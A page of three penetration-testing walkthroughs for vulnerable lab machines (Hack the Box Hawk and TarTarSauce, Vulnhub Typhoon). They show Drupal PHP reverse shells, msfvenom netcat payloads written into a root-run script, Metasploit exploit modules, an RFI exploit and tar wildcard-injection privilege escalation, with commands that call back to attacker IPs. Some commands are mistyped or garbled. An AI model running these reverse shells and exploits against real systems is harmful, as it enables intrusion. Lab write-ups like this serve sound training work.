Hack the Box: Hawk Walkthrough

Today we are going to solve another CTF challenge “HawkNew”. HawkNew is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Easy

Task: To find user.txt and root.txt

Note: Since these labs are online available therefore they have static IP. The IP of HawkNew is 10.10.10.102

Penetration Methodology:

§  Port scanning and IP discovery

§  Anonymous FTP Login

§  Checking file type

§  Getting Login Credentials

§  Browsing IP through port 80

§  Exploiting Drupal

§  Reading First Flag User.txt

§  Getting Login Credentials

§  Spawning TTY Shell

§  Searching exploit via Searchsploit

§  Getting root Access

§  Reading Final Flag Root.txt

Walkthrough

Let’s start off with our basic nmap command to find out the open ports and running services.

nmap -A 10.10.10.102

The Nmap output shows various open ports: 21(ftp), 22(ssh), 80 http server (Drupal CMS), 8082(h2 database http console).

From the NMAP Scan output we saw that ftp Port 21 is Open and the next thing that catches our eyes is it so it has Anonymous login allowed.

ftp 10.10.10.102

We easily connected to ftp through Anonymous Login. Moving on, after navigating through multiple directories we found a hidden file i.e. “.drupal.txt.enc “and then we transferred the file to our local machine.

Since .drupa.txt.enc is encrypted. Let’s check the file type using ‘file’ command.

file.drupal.txt.enc

It came out to be openssl encoded data with salted password. Clearly we need to decrypt the file to get any further clue.

To crack this file, we have used an openssl bruteforce tool which is easily available on github. You can download it from the given below link or can run the following command for downloading and script execution.

git clonehttps://github.com/deltaclock/go-openssl-bruteforce.git

./openssl-brute --file /root/.drupal.txt.enc

Boom!! We have successfully cracked the file and the Password Hint we got is “PencilKeyboardScanner123” this could be the password for CMS Login. Let’s Check it.

As port 80 is running http server, we open the target machine’s IP address in our browser and found out it’s a Drupal Login Page. To Login this page we have used a Basic Username: admin and Password: PencilKeyboardScanner123.

Oh yeah!! We have successfully logged into admin dashboard. Now go to modules and then enable the check box for Path and PHP filter.

After that go to Content > Add Content > Basic Page to create a basic page where we can write malicious code to spawn the web shell. Just give any title for your malicious code.

Here we have written one-liner code for PHP reverse shell with the help of Pentest Monkey website.

&1|nc 10.10.14.10 1234 >/tmp/f"); ?>

Then select the Text format as “PHPCode”. Before saving it you should start netcat listener on the listening port. So, once the code is executed it will establish a reverse connection.

nc -lvp 1234

We got a reverse connection of victim’s machine on our netcat listener. To spawn the proper shell we have used python3 bin bash one liner.

python3 -c ‘import pty;pty.spawn(“/bin”bash”)’

Inside /home/denial we have got to User.txt flag, now time to find the root flag. While exploring through directories, we thought of reading the contents of the “settings.php” file, in this file we found the password: drupal4hawk

cat settings.php | grep Password

Then with the following command we switch the user and logging in as user daniel.

su daniel

Password: drupal4hawk

Here we have used Simple phyton3 commands to escape the python3 interpreter.

>>import pty

>>pty.spawn(‘/bin/bash’)

From Nmap scan output we notice that “H2 database running on port 8082”, therefore we search out for H2 database exploit in searchsploit.

searchsploit H2 database

It came out to be a Remote Code Execution. The exploit we have used is highlighted, after that we have copied the exploit 45506.py in the /root directory and run a Python server to download the file in the target machine.

searchsploit -m 45506

python -m SimpleHTTPServer 8080

Afterwards we have downloaded our exploit 45506.py in the /tmp directory of target machine. Then Grant the FULL permission to the exploit and execute it using command.

cd /tmp

wget http://10.10.14.10:8080/45506.py

chmod 777 455506.py

python3 45506.py –H 127.0.0.1:8082

id

Finally!! We have got the root access. Now let’s go and get the “root.txt”. We take a look at the content of the file and find our final flag.

Author: Ashray Gupta is a Security Researcher and Technical Writer at Hacking Articles. Contributing his 2 years in the field of security as a Penetration Tester and Forensic Computer Analyst. Contact Here

Typhoon: Vulnhub Walkthrough

Typhoon VM contains several vulnerabilities and configuration errors. Typhoon can be used to test vulnerabilities in network services, configuration errors, vulnerable web applications, password cracking attacks, privilege escalation attacks, post exploitation steps, information gathering and DNS attacks. Prisma trainings involve practical use of Typhoon.

Flag: root-flag

Since there are multiple ways in which we can exploit this machine. Therefore we have used two methods to capture the flag as follows:

Method 1- Using a LOCAL PRIVILEGE ESCALATION SHELL after logging into SSH.

Let’s Begin with the Walkthrough!!

Let’s start off with scanning the network to find our targets IP.

netdiscover

We found our target IP –> 192.168.1.105
Our next motive is to scan the target IP with nmap.
nmap -A 192.168.1.101
The NMAP output shows various open ports: 21(ftp), 22(ssh), 25(smtp), 53(domain), 80(http), 110(pop3), 111(rpcbind), 139(netbios-ssn), 143(imap), 445(netbios-ssn), 631(ipp), 993(ssl/imaps), 995(ssl/pop3), 2049(nfs_acl), 3306(mysql), 5432(postgrespl), 8080(http).
Further we notice that there is a entry /monoadmin/ in robot.txt as it might be useful.

We also noticed that port 8080 is open for Apache Tomcat/ Coyote JSP Engine 1.1. This could be another way of exploiting this machine. But will see to it later on.

Moving on, Since port 80 is also open. So, we browsed the found directory /mongoadmin/ into the browser. The result displayed is shown in the image. Here we set change database to credentials(84mb). It will display a link of 2 Credentials. Click on it.

Clicking on the 2 Credential link will give us 2 Credentials [username]:typhoon and [password]:789456123 . These credentials might be a great help for further enumeration.

After a sometime, we just strike with a idea WHY NOT USE THE FOUND CREDS TO LOGIN WITH SSH?. Since SSH port 22 is also open.

Than we simply logged in SSH with CREDENTIALS Username:typhoon & Password: 789456123

ssh typhoon@192.168.1.101

Then we checked system information and found out Ubuntu 14.04 is running on target machine. Good thing we were familiar with an exploit for Ubuntu 14.04.

Next we look for an exploit for ubuntu 14.04 using searchsploit. The exploit we have used have highlighted, after that we have copied the exploit 37292.c in the /root/ directory. Executing a Python server to download the file in the target machine.

Afterwards we have downloaded our exploit 37292.c in the /tmp directory. After compilation and granting permissions to the exploit. We have executed it.

Booyeah!! We have got the root access and found our FLAG. We take a look at the content of the file and greeted with a congratulatory message.  

Method 2

Using Tomcat Manager Upload to get the meterpreter and then further establishing a reverse connection to get root access.

Let’s Begin with the Walkthrough!!

Since in Method-1 port scanning, we notice that port 8080 is open for Apache Tomcat/ Coyote JSP Engine 1.1. So let’s browse the Target IP on port 8080 on the browser.

We are very fimiliar with Tomcat Server Login using manager webapp due to our previous lab experiences. Without wasting time we straight away logged into Tomcat Server using Metasploits Tomcat Manager using the Default credentials for Tomcat Server Login.

[username]:tomcat

[password]:tomcat

Oh Yeah! We have got the meterpreter. After spending a lot of time of enumeration, we found a directory /tab which consist of file script.sh that was owned by root and has FULL Permission. So we thought of inserting a malicious code in script.sh.

 Moving on!! We need to create a bash code using Msfvenom:

msfvenom –p cmd/unix/reverse_netcat lhost=192.168.1.109 lport=1234 R

After that, append the above generated malicious code in the script.sh file.

echo “mkfifo /tmp/vvwjo; nc 192.168.1.109 1234 0

/tmp/vvwjo 2>&1; rm /tmp/vvwjo” > script.sh

Since the malicious code got executed with the script.sh file. Therefore we got a reverse shell on our netcat listener.

Yeah!! We have got the root access and found root-flag. We take a look at the content of the file and greeted with a congratulatory message.

3^rd Method:Exploiting Drupal CMS

Unfortunately on exploring port 80 we didn’t observe any remarkable things, therefore, we try to enumerate web directory with the help of Dirb tool.

dirb http://192.168.1.101

It was wonderful to observe that there was two CMS  as highlighted in the below image.

On exploring /Drupal in the web browser, it put up the following web page which was associated to Drupal cms.

Without wasting must time, we chase towards metasploit and run following module to exploit Drupal cms.

use exploit/unix/webapp/drupal_drupalgeddon2

msf exploit(/unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.1.101

msf exploit(/unix/webapp/drupal_drupalgeddon2) > set targeturi /drupal

msf exploit(/unix/webapp/drupal_drupalgeddon2) > exploit

Booom!! It was terrific moment to see meterpreter session of the target machine. Now for the post exploitation you can follow above methodology which we have already discussed in 1^st method.

4^th Method: Exploiting Lotus CMS

Scroll up and kindly notice the result which we have obtain from the dirb scan, there we had found two CMS. We had already exploit Drupal, now let’s go for next CMS and try to exploit it, if possible

So on exploring /cms in the web browser, it put up the following web page which was associated to Lotus cms.

Without wasting must time, again we chase towards metasploit and run following module to exploit lotus cms.

use exploit/multi/http/lcms_php_exec

msf exploit(multi/http/lcms_php_exec) > set rhost 192.168.1.101

msf exploit(multi/http/lcms_php_exec) > set uri /cms/

msf exploit(multi/http/lcms_php_exec) > exploit

Great, we have own another meterpreter session of the target machine. Now for the post exploitation you can follow above methodology which we have already discussed in 1st method.

Hack the Box: TarTarSauce Walkthrough

Today we are going to solve another CTF challenge “TarTarSauce”. It is a retired vulnerable lab presented by Hack the Box for helping pentester’s to perform online penetration testing according to your experience level; they have a collection of vulnerable labs as challenges, from beginners to Expert level.

Level: Expert

Task: To find user.txt and root.txt file

Note: Since these labs are online available therefore they have a static IP. The IP of TarTarSauce is 10.10.10.88

Penetrating Methodology

§  Network scanning (Nmap)

§  Directory Enumeration (Drib)

§  Exploiting Wordpress against RFI Vulnerability

§  Spawning TTY shell

§  Check sudoers list permissions

§  Wildcard injection privilege escalation

§  Modify backup file to get root flag

Walkthrough

Let’s start off with our basic nmap command to find out the open ports and services.

nmap -A 10.10.10.88

From given below image, you can observe we found port 80 is open for http service and found robot.txt with 5 disallowed entries.

Let’s navigate to port 80 through a web browser. By exploring IP in the URL box, it puts up following web page as shown in the below image.

We don’t find anything on the webpage, so we run dirb to enumerate the directories. We find a directory called “/webservices/”. We further enumerate “/webservices/” as we don’t find anything in that directory.

dirb http://10.10.10.88

dirb http://10.10.10.88/webservices/

Dirb scan gave us the directory called “/webservices/wp/” that hosts a wordpress site.

We run wpscan to enumerate the themes and plugins and find a vulnerable plugin called “Gwolle Guestbook”. We search for the exploit and find that it is vulnerable to Remote File Inclusion (RFI).

We follow the instructions according to the given POC on exploit-db and use the php-reverse-shell.php available on kali Linux. We copy it to desktop and rename it to wp-load.php to execute our php shell using RFI. We start our python HTTP server to exploit RFI on the target machine.

python -m SimpleHTTPServer 80

We setup our listener using netcat; as soon as we execute our php shell through RFI, we are successfully able to get a reverse shell. We go to “/home” directory and find a folder called “onuma”. We are unable to access “onuma” directory. So we spawn a tty shell using python to check the sudoers list.

python -c “import pty; pty.spawn(‘/bin/bash’)”

We check the sudoers list and find that we can run tar as user “onuma” without any password. Hence we can exploit wild card injection for privilege escalation.

sudo -l

We create an nc reverse shell using msfvenom.

msfvenom -p cmd/unix/reverse_netcat lhost=10.10.14.177 lport=4444 R

Now we move to the reverse shell and create a bash file using the nc command and save it as “wp.sh”.

Now tar has the ability to execute command using “--checkpoint-action”. So we created a file named “--checkpoint-action=exec=sh wp.sh” and “--checkpoint=1”.  So that we can execute our command as user onuma.

mkdir data

cd data

echo “mkfifo /tmp/cezbk; nc 10.10.14.177 4444 0

/tmp/cezbk 2>&1; rm /tmp/cezbk” > wp.sh

echo “” > “--checkpoint-action=exec=sh wp.sh”

echo “” > --checkpoint=1

sudo -u onuma /bin/tar cf archive.tar *

We use setup our listener using netcat, as soon as we run the tar command as user “onuma” we get our reverse shell as user “onuma”. Now we change the directory to /home/onuma and find the file called “user.txt” we take a look at the content of the file and find the 1^st flag. After finding the flag we spawn a tty shell using python.

python -c ‘import pty; pty.spawn(“/bin/bash”)’

Enumerating through the system we find a file a called a backuperer that has been symlinked to a file a named “backup” in “/usr/local/bin directory”.

We take a look at the content of the file and find that it is a file that creates a gzip archive of files inside “/var/www/html/”. It also checks the integrity of the file after 30 seconds from the creation of the file.

We use a script that takes the advantage of the “sleep” function of the script. As it waits for 30 seconds and then checks the integrity of the file we have 30 seconds to recreate the archive. We use this script here.  After running the script we find the root flag.